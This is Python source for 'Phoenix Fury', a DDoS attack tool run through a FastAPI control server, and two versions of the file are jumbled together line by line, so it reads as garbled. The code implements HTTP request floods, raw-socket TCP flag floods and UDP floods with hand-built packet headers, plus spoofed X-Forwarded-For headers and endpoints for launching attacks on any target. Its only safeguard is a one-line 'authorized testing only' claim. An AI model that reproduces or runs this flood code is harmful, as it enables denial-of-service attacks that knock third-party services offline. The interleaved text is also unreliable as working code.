#!/usr/bin/env python3import socket """import struct Phoenix Fury v8.0 - NUCLEAR MODEimport random Maximum CPU/RAM utilization for extreme RPSimport time """import multiprocessing import socketimport threading import multiprocessingimport asyncio import timeimport aiohttp import osimport os from ctypes import c_ulonglongimport sys from fastapi import FastAPI, BackgroundTasksimport psutil from pydantic import BaseModelimport ssl import uvicornfrom typing import Literal, List, Union from ctypes import c_ulonglong app = FastAPI(title="Phoenix Fury v8.0 - NUCLEAR MODE") # Use uvloop for a significant performance boost # ============================================================================try: # AUTO-CONFIG: USE ALL AVAILABLE RESOURCES import uvloop # ============================================================================ asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) CPU_COUNT = os.cpu_count() or 8except ImportError: # NUCLEAR MODE: 64 processes per CPU core! pass TOTAL_PROCESSES = CPU_COUNT * 64 # 48 cores = 3,072 processes REQUESTS_PER_BURST = 1000 # Each process sends 1000 reqs per connectionfrom fastapi import FastAPI, HTTPException, BackgroundTasks from pydantic import BaseModel, Field print(f"[NUCLEAR MODE] {CPU_COUNT} cores detected")import uvicorn print(f"[NUCLEAR MODE] Spawning {TOTAL_PROCESSES} attack processes") print(f"[NUCLEAR MODE] Expected: {TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,} RPS")# --- Application Setup --- app = FastAPI( # ============================================================================ title="šŸ”„ Phoenix Fury API v7.0 - MAXIMUM POWER Edition", # MODELS description="Extreme stress testing tool with auto-optimized settings for maximum RPS/PPS. For authorized testing only.", # ============================================================================ version="7.0.0" class AttackConfig(BaseModel):) target: str port: int = 80# --- Auto-Optimized Configuration --- duration: int = 60CPU_COUNT = psutil.cpu_count(logical=True) or 8 TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3) # ============================================================================ # ULTRA-AGGRESSIVE WORKER - MAXIMUM SPEED# REALISTIC CONFIG - Fewer processes that actually work # ============================================================================def calculate_optimal_config(): def nuclear_worker(worker_id, target_ip, port, stop_flag, counter): """Calculate reasonable process count.""" """ # MUCH FEWER processes - focus on making them work! Ultra-aggressive worker: tight loop, no error handling, maximum speed. if CPU_COUNT >= 32: """ MAX_PROCESSES = CPU_COUNT * 2 # 64-96 processes for 32-48 cores # Pre-build request (minimal) elif CPU_COUNT >= 16: request = f"GET /?w={worker_id}&c={{}} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n".encode() MAX_PROCESSES = CPU_COUNT * 3 # 48 processes for 16 cores elif CPU_COUNT >= 8: local_count = 0 MAX_PROCESSES = CPU_COUNT * 4 # 32 processes for 8 cores req_num = 0 elif CPU_COUNT >= 4: MAX_PROCESSES = CPU_COUNT * 6 # 24 processes for 4 cores # INFINITE LOOP: Connect → Blast requests → Reconnect else: while not stop_flag.value: MAX_PROCESSES = CPU_COUNT * 8 # 16 processes for 2 cores sock = None try: REQUESTS_PER_CONNECTION = 500 # Send 500 requests per socket # Fast socket creation total_capacity = MAX_PROCESSES * REQUESTS_PER_CONNECTION sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) return MAX_PROCESSES, REQUESTS_PER_CONNECTION, total_capacity sock.settimeout(2) sock.connect((target_ip, port))MAX_PROCESSES, MAX_CONCURRENCY_PER_PROCESS, TOTAL_WORKERS = calculate_optimal_config() STATS_BATCH_UPDATE_SIZE = 100 # Smaller batches for better feedback # BLAST REQUESTS - No delays, no checks for _ in range(REQUESTS_PER_BURST):# --- L7 Enhanced Headers Pool --- try:USER_AGENTS = [ sock.send(request.replace(b"{}", str(req_num).encode())) "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36", local_count += 1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/537.36", req_num += 1 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36", except: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0", break "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Safari/604.1" ] sock.close()REFERERS = [ except: "https://www.google.com/search?q=", pass # Ignore ALL errors, keep going "https://www.bing.com/search?q=", "https://www.facebook.com/", # Update shared counter every 500 requests "https://www.twitter.com/", if local_count >= 500: "https://www.reddit.com/", counter.value += local_count "https://www.youtube.com/" local_count = 0] # Final updatedef get_random_headers() -> dict: if local_count > 0: """Generates randomized headers with IP spoofing for L7 attacks.""" counter.value += local_count return { "User-Agent": random.choice(USER_AGENTS), # ============================================================================ "Referer": random.choice(REFERERS) + str(random.randint(1000, 9999)), # ATTACK MANAGER "X-Forwarded-For": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}", # ============================================================================ "X-Real-IP": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}", class NuclearAttackManager: "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", def __init__(self): "Accept-Language": "en-US,en;q=0.9", self.active = False "Accept-Encoding": "gzip, deflate, br", self.processes = [] "Cache-Control": "no-cache", self.stop_flag = multiprocessing.Value('i', 0) "Pragma": "no-cache" self.counter = multiprocessing.Value(c_ulonglong, 0) } self.start_time = 0 # ==================================================================================== def launch(self, target: str, port: int, duration: int):# Pydantic API Models (Simplified - Auto Max Settings) """Launch nuclear attack with ALL processes."""# ==================================================================================== if self.active:class BaseAttackConfig(BaseModel): return target: str = Field(..., description="Target hostname or IP address") port: int = Field(..., ge=1, le=65535, description="Target port") self.active = True duration: int = Field(60, ge=10, le=7200, description="Attack duration in seconds") self.stop_flag.value = 0 self.counter.value = 0class L4TCPConfig(BaseAttackConfig): self.start_time = time.time() method: Literal["syn", "ack", "fin", "rst", "psh", "urg"] = Field("syn", description="TCP flag for the attack") self.processes = [] class L4UDPConfig(BaseAttackConfig): # Resolve target method: Literal["flood", "pps"] = Field("flood", description="'flood' for large packets, 'pps' for minimal packets") try: payload_size: int = Field(1400, ge=0, le=1472, description="Size of UDP payload. 0 for PPS mode.") target_ip = socket.gethostbyname(target.replace("http://", "").replace("https://", "").split("/")[0]) except:class L7Config(BaseAttackConfig): target_ip = target method: Literal["get", "post", "head"] = Field("get", description="HTTP method.") path: str = Field("/", description="Request path") print(f"\n{'='*70}") print(f"šŸ”„ NUCLEAR ATTACK LAUNCHED")class StatusResponse(BaseModel): print(f" Target: {target_ip}:{port}") attack_active: bool print(f" Processes: {TOTAL_PROCESSES:,}") attack_type: str print(f" Duration: {duration}s") target_host: str print(f"{'='*70}\n") target_ip: str port: int # Spawn ALL processes at once duration: int for i in range(TOTAL_PROCESSES): elapsed_time: float p = multiprocessing.Process( processes: int target=nuclear_worker, total_sent: int args=(i, target_ip, port, self.stop_flag, self.counter) current_rate_pps_rps: float ) cpu_usage_percent: float p.start() memory_usage_percent: float self.processes.append(p) # ==================================================================================== # Stats reporter# CORE NETWORKING & PACKET CRAFTING def report_stats():# ==================================================================================== last_count = 0def check_root() -> bool: last_time = time.time() """Check if running with root/admin privileges.""" try: while not self.stop_flag.value: return os.geteuid() == 0 time.sleep(2) except AttributeError: now = time.time() import ctypes current = self.counter.value return ctypes.windll.shell32.IsUserAnAdmin() != 0 rps = (current - last_count) / (now - last_time) elapsed = now - self.start_timedef resolve_target(target: str) -> str: """Resolve hostname to IP address.""" print(f"[{elapsed:.0f}s] Total: {current:,} | Current RPS: {rps:,.0f}") try: if "://" in target: last_count = current target = target.split("://")[1].split("/")[0] last_time = now return socket.gethostbyname(target) except socket.gaierror: import threading raise ValueError(f"Could not resolve hostname: {target}") stats_thread = threading.Thread(target=report_stats, daemon=True) stats_thread.start()def get_local_ip(target_ip: str) -> str: """Get local IP address that routes to target.""" # Auto-stop after duration try: def auto_stop(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) time.sleep(duration) s.connect((target_ip, 1)) self.terminate() ip = s.getsockname()[0] s.close() stop_thread = threading.Thread(target=auto_stop, daemon=True) return ip stop_thread.start() except: return "127.0.0.1" def terminate(self): """Stop all processes."""def calculate_checksum(data: bytes) -> int: if not self.active: """Calculate IP/TCP/UDP checksum.""" return s = 0 if len(data) % 2: print("\nāš ļø Terminating attack...") data += b'\0' self.stop_flag.value = 1 for i in range(0, len(data), 2): s += (data[i] << 8) + data[i+1] # Give processes 3 seconds to finish s = (s >> 16) + (s & 0xffff) time.sleep(3) s += (s >> 16) return (~s) & 0xffff # Force kill remaining for p in self.processes:def create_ip_header(src_ip: str, dst_ip: str, proto: int, total_len: int) -> bytes: if p.is_alive(): """Create IP header.""" p.terminate() header = struct.pack('!BBHHHBBH4s4s', (4 << 4) | 5, 0, total_len, random.randint(1, 65535), 0, 64, proto, 0, # Wait for all to die socket.inet_aton(src_ip), socket.inet_aton(dst_ip) for p in self.processes: ) p.join(timeout=1) return header[:10] + struct.pack('!H', calculate_checksum(header)) + header[12:] # Final statsdef create_tcp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, flags: int) -> bytes: elapsed = time.time() - self.start_time """Create TCP header with specified flags.""" total = self.counter.value seq = random.randint(1, 4294967295) avg_rps = total / elapsed if elapsed > 0 else 0 ack_seq = 0 header = struct.pack('!HHLLBBHHH', src_port, dst_port, seq, ack_seq, (5 << 4), flags, 5840, 0, 0) print(f"\n{'='*70}") pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, len(header)) print(f"āœ… ATTACK COMPLETED") checksum = calculate_checksum(pseudo_header + header) print(f" Total Requests: {total:,}") return header[:16] + struct.pack('!H', checksum) + header[18:] print(f" Duration: {elapsed:.2f}s") print(f" Average RPS: {avg_rps:,.2f}")def create_udp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes: print(f"{'='*70}\n") """Create UDP header.""" udp_len = 8 + len(payload) self.active = False header = struct.pack('!HHHH', src_port, dst_port, udp_len, 0) self.processes = [] pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_UDP, udp_len) checksum = calculate_checksum(pseudo_header + header + payload) # Global manager return header[:6] + struct.pack('!H', checksum) ATTACK_MANAGER = NuclearAttackManager() # ==================================================================================== # ============================================================================# OPTIMIZED L4 WORKER PROCESS # API ENDPOINTS# ==================================================================================== # ============================================================================def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type, method_details): @app.get("/") """Ultra-optimized L4 worker with raw sockets.""" def root(): try: return { sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) "name": "Phoenix Fury v8.0 - NUCLEAR MODE", sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) "processes": TOTAL_PROCESSES, # Increase socket buffer for higher throughput "cpu_cores": CPU_COUNT, sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024) "status": "READY" if not ATTACK_MANAGER.active else "ATTACKING" local_ip = get_local_ip(target_ip) } except Exception as e: print(f"[PID {os.getpid()}] L4 Worker Init Error: {e}", file=sys.stderr) @app.post("/attack") return def start_attack(config: AttackConfig, background: BackgroundTasks): """Launch nuclear L7 attack.""" local_counter = 0 if ATTACK_MANAGER.active: flag_map = {"syn": 2, "ack": 16, "fin": 1, "rst": 4, "psh": 8, "urg": 32} return {"error": "Attack already in progress"} # Pre-generate payloads for UDP background.add_task( if attack_type == 'udp': ATTACK_MANAGER.launch, if method_details == 'pps' or method_details == 0: config.target, payload = b'' config.port, else: config.duration payload = os.urandom(method_details) ) udp_len = 8 + len(payload) return { # Packet crafting loop - optimized for speed "status": "launched", while not stop_event.is_set(): "target": config.target, try: "port": config.port, src_port = random.randint(10000, 65535) "processes": TOTAL_PROCESSES, "expected_rps": f"{TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,}" if attack_type == 'tcp': } ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_TCP, 40) tcp_header = create_tcp_header(local_ip, target_ip, src_port, port, flag_map.get(method_details, 2)) @app.post("/stop") packet = ip_header + tcp_header def stop_attack(): else: # udp """Stop current attack.""" ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_UDP, 20 + udp_len) ATTACK_MANAGER.terminate() udp_header = create_udp_header(local_ip, target_ip, src_port, port, payload) return {"status": "stopped"} packet = ip_header + udp_header + payload @app.get("/status") sock.sendto(packet, (target_ip, port)) def get_status(): local_counter += 1 """Get current attack status.""" if not ATTACK_MANAGER.active: # Batch counter updates for performance return {"active": False} if local_counter >= STATS_BATCH_UPDATE_SIZE: with shared_counter.get_lock(): elapsed = time.time() - ATTACK_MANAGER.start_time shared_counter.value += local_counter total = ATTACK_MANAGER.counter.value local_counter = 0 current_rps = total / elapsed if elapsed > 0 else 0 except: pass # Ignore errors for maximum speed return { "active": True, # Final counter update "elapsed": round(elapsed, 1), if local_counter > 0: "total_requests": total, with shared_counter.get_lock(): "current_rps": round(current_rps, 2), shared_counter.value += local_counter "processes": TOTAL_PROCESSES sock.close() } # ==================================================================================== if __name__ == "__main__":# SIMPLE L7 WORKER - BLOCKING SOCKETS THAT ACTUALLY WORK! multiprocessing.set_start_method('fork', force=True)# ==================================================================================== uvicorn.run(app, host="0.0.0.0", port=8000, workers=1, log_level="warning")def l7_worker_process(stop_event, shared_counter, target_ip, port, path, method, requests_per_conn): """L7 worker - SIMPLE blocking approach.""" use_ssl = (port in [443, 8443]) host = target_ip # Pre-build HTTP request template http_template = f"GET {path}?_={{}} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n" local_counter = 0 req_counter = 0 conn_count = 0 print(f"[PID {os.getpid()}] Worker starting...", flush=True) # TIGHT LOOP: Connect → Send burst → Disconnect → Repeat while not stop_event.is_set(): sock = None try: # Create socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 65536) sock.settimeout(3) # Connect sock.connect((host, port)) conn_count += 1 if use_ssl: import ssl as ssl_module context = ssl_module.create_default_context() context.check_hostname = False context.verify_mode = ssl_module.CERT_NONE sock = context.wrap_socket(sock, server_hostname=host) # Send burst of pipelined requests for i in range(requests_per_conn): if stop_event.is_set(): break try: request = http_template.format(req_counter).encode() sock.send(request) local_counter += 1 req_counter += 1 except Exception as e: break # Close connection try: sock.close() except: pass except Exception as e: if conn_count == 0: # First connection failed print(f"[PID {os.getpid()}] Connection failed: {e}", flush=True) time.sleep(1) finally: if sock: try: sock.close() except: pass # Update shared counter in batches if local_counter >= STATS_BATCH_UPDATE_SIZE: with shared_counter.get_lock(): shared_counter.value += local_counter local_counter = 0 # Final update if local_counter > 0: with shared_counter.get_lock(): shared_counter.value += local_counter print(f"[PID {os.getpid()}] Worker stopped: {conn_count} connections, {local_counter} requests", flush=True) # ==================================================================================== # CENTRALIZED ATTACK MANAGER (SINGLETON) # ==================================================================================== class AttackManager: """Singleton manager for all attacks.""" _instance = None def __new__(cls): if cls._instance is None: cls._instance = super(AttackManager, cls).__new__(cls) cls._instance._initialized = False return cls._instance def __init__(self): if self._initialized: return self._initialized = True self.lock = threading.Lock() self.stats_thread = None self._reset_state() def _reset_state(self): """Reset all attack state.""" self.attack_active = False self.attack_type = "None" self.target_host = "None" self.target_ip = "None" self.port = 0 self.duration = 0 self.start_time = 0.0 self.process_count = 0 self.processes: List[multiprocessing.Process] = [] self.stop_event = multiprocessing.Event() self.counter = multiprocessing.Value(c_ulonglong, 0) self.current_rate = 0.0 def is_active(self): """Check if an attack is currently active.""" with self.lock: return self.attack_active def _stats_calculator(self): """Background thread to calculate current rate.""" last_check_time = time.time() last_count = 0 while not self.stop_event.is_set(): time.sleep(1) now = time.time() current_count = self.counter.value elapsed = now - last_check_time if elapsed > 0: self.current_rate = (current_count - last_count) / elapsed last_check_time = now last_count = current_count self.current_rate = 0.0 def start(self, config: Union[L7Config, L4TCPConfig, L4UDPConfig], family: str): """Start an attack with auto-optimized settings.""" with self.lock: if self.attack_active: return try: self.target_host = config.target self.target_ip = resolve_target(self.target_host) if family == 'l4' and not check_root(): raise PermissionError("Layer 4 attacks require root privileges.") except (ValueError, PermissionError) as e: print(f"Attack validation failed: {e}", file=sys.stderr) self._reset_state() return self.attack_active = True self.port = config.port self.duration = config.duration self.process_count = MAX_PROCESSES # AUTO MAX self.start_time = time.time() worker_target, worker_args, attack_name = (None, None, "Unknown") if family == 'l7' and isinstance(config, L7Config): attack_name = f"L7-{config.method.upper()}" worker_target = l7_worker_process worker_args = ( self.stop_event, self.counter, self.target_ip, config.port, config.path, config.method, MAX_CONCURRENCY_PER_PROCESS # AUTO MAX ) elif family == 'l4': worker_target = l4_worker_process if isinstance(config, L4TCPConfig): attack_name = f"L4-TCP-{config.method.upper()}" worker_args = ( self.stop_event, self.counter, self.target_ip, config.port, 'tcp', config.method ) elif isinstance(config, L4UDPConfig): attack_name = f"L4-UDP-{config.method.upper()}" worker_args = ( self.stop_event, self.counter, self.target_ip, config.port, 'udp', config.method if config.method == 'pps' else config.payload_size ) self.attack_type = attack_name print("=" * 70) print(f"šŸ”„ PHOENIX FURY MAXIMUM POWER - ATTACK INITIATED šŸ”„") print(f" Type: {self.attack_type}") print(f" Target: {self.target_host}:{self.port} ({self.target_ip})") print(f" Duration: {self.duration}s") print(f" Processes: {self.process_count} (AUTO MAX)") if family == 'l7': print(f" Concurrency per Process: {MAX_CONCURRENCY_PER_PROCESS}") print(f" Total Concurrent Tasks: {self.process_count * MAX_CONCURRENCY_PER_PROCESS:,}") print("=" * 70) # Launch all worker processes for _ in range(self.process_count): p = multiprocessing.Process(target=worker_target, args=worker_args) self.processes.append(p) p.start() # Start stats calculator self.stats_thread = threading.Thread(target=self._stats_calculator) self.stats_thread.start() def stop(self): """Stop the current attack.""" with self.lock: if not self.attack_active: return print(f"\nāš ļø Stop signal received. Terminating {len(self.processes)} processes...") self.stop_event.set() # Wait for processes to finish for p in self.processes: p.join(timeout=5) # Force terminate hanging processes for p in self.processes: if p.is_alive(): print(f"Terminating hanging process PID: {p.pid}") p.terminate() # Stop stats thread if self.stats_thread: self.stats_thread.join(timeout=2) # Calculate final stats elapsed = time.time() - self.start_time total_sent = self.counter.value avg_rate = total_sent / elapsed if elapsed > 0 else 0 print("=" * 50) print("āœ… ATTACK TERMINATED") print(f" Total Sent: {total_sent:,}") print(f" Elapsed Time: {elapsed:.2f}s") print(f" Average Rate: {avg_rate:,.2f} PPS/RPS") print("=" * 50) self._reset_state() def get_status(self) -> StatusResponse: """Get current attack status.""" with self.lock: return StatusResponse( attack_active=self.attack_active, attack_type=self.attack_type, target_host=self.target_host, target_ip=self.target_ip, port=self.port, duration=self.duration, elapsed_time=round(time.time() - self.start_time, 2) if self.attack_active else 0, processes=self.process_count, total_sent=self.counter.value, current_rate_pps_rps=round(self.current_rate, 2), cpu_usage_percent=psutil.cpu_percent(), memory_usage_percent=psutil.virtual_memory().percent ) MANAGER = AttackManager() # ==================================================================================== # FASTAPI ENDPOINTS # ==================================================================================== @app.on_event("startup") async def on_startup(): """Startup message with system info.""" print("=" * 80) print("šŸ”„ Phoenix Fury API v7.0 - EXTREME PERFORMANCE Edition") print(f" System Auto-Detected:") print(f" CPU Cores: {CPU_COUNT}") print(f" RAM: {TOTAL_RAM_GB:.1f} GB") print(f" ") print(f" Auto-Optimized Configuration:") print(f" Worker Processes: {MAX_PROCESSES}") print(f" Requests per Connection: {MAX_CONCURRENCY_PER_PROCESS:,}") print(f" ") print(f" Expected Performance:") print(f" Estimated RPS: {int(MAX_PROCESSES * 100):,} - {int(MAX_PROCESSES * 500):,}") print(f" ") if check_root(): print("āœ… Running with root privileges - L4 attacks ENABLED") else: print("āš ļø WARNING: Not root - L4 attacks will FAIL") print("=" * 80) def run_attack_lifecycle(config: Union[L7Config, L4TCPConfig, L4UDPConfig], family: str, background_tasks: BackgroundTasks): """Run attack lifecycle in background.""" if MANAGER.is_active(): raise HTTPException(status_code=409, detail="An attack is already in progress.") background_tasks.add_task(MANAGER.start, config, family) background_tasks.add_task(time.sleep, config.duration) background_tasks.add_task(MANAGER.stop) @app.post("/attack/layer7") def api_start_l7(config: L7Config, background_tasks: BackgroundTasks): """Start L7 attack with auto-optimized settings.""" run_attack_lifecycle(config, 'l7', background_tasks) return { "status": "success", "message": f"L7 attack initiated on {config.target}:{config.port}", "processes": MAX_PROCESSES, "concurrency_per_process": MAX_CONCURRENCY_PER_PROCESS, "total_workers": MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS } @app.post("/attack/layer4/tcp") def api_start_l4_tcp(config: L4TCPConfig, background_tasks: BackgroundTasks): """Start L4 TCP attack with auto-optimized settings.""" run_attack_lifecycle(config, 'l4', background_tasks) return { "status": "success", "message": f"L4 TCP {config.method.upper()} attack initiated on {config.target}:{config.port}", "processes": MAX_PROCESSES } @app.post("/attack/layer4/udp") def api_start_l4_udp(config: L4UDPConfig, background_tasks: BackgroundTasks): """Start L4 UDP attack with auto-optimized settings.""" run_attack_lifecycle(config, 'l4', background_tasks) return { "status": "success", "message": f"L4 UDP {config.method.upper()} attack initiated on {config.target}:{config.port}", "processes": MAX_PROCESSES } @app.post("/attack/stop") def api_stop_attack(): """Stop the current attack.""" if not MANAGER.is_active(): return {"status": "info", "message": "No attack is currently running."} MANAGER.stop() return {"status": "success", "message": "Stop signal sent."} @app.get("/status", response_model=StatusResponse) def get_status(): """Get current attack status and system metrics.""" return MANAGER.get_status() @app.get("/") def root(): """Root endpoint with API info.""" return { "message": "šŸ”„ Phoenix Fury API v7.0 - MAXIMUM POWER Edition", "docs": "/docs", "system": { "cpu_cores": CPU_COUNT, "ram_gb": round(TOTAL_RAM_GB, 1), "worker_processes": MAX_PROCESSES, "requests_per_connection": MAX_CONCURRENCY_PER_PROCESS, "estimated_rps": f"{int(MAX_PROCESSES * 100):,} - {int(MAX_PROCESSES * 500):,}" } } # --- Main Execution --- if __name__ == "__main__": multiprocessing.freeze_support() uvicorn.run(app, host="0.0.0.0", port=8000, workers=1)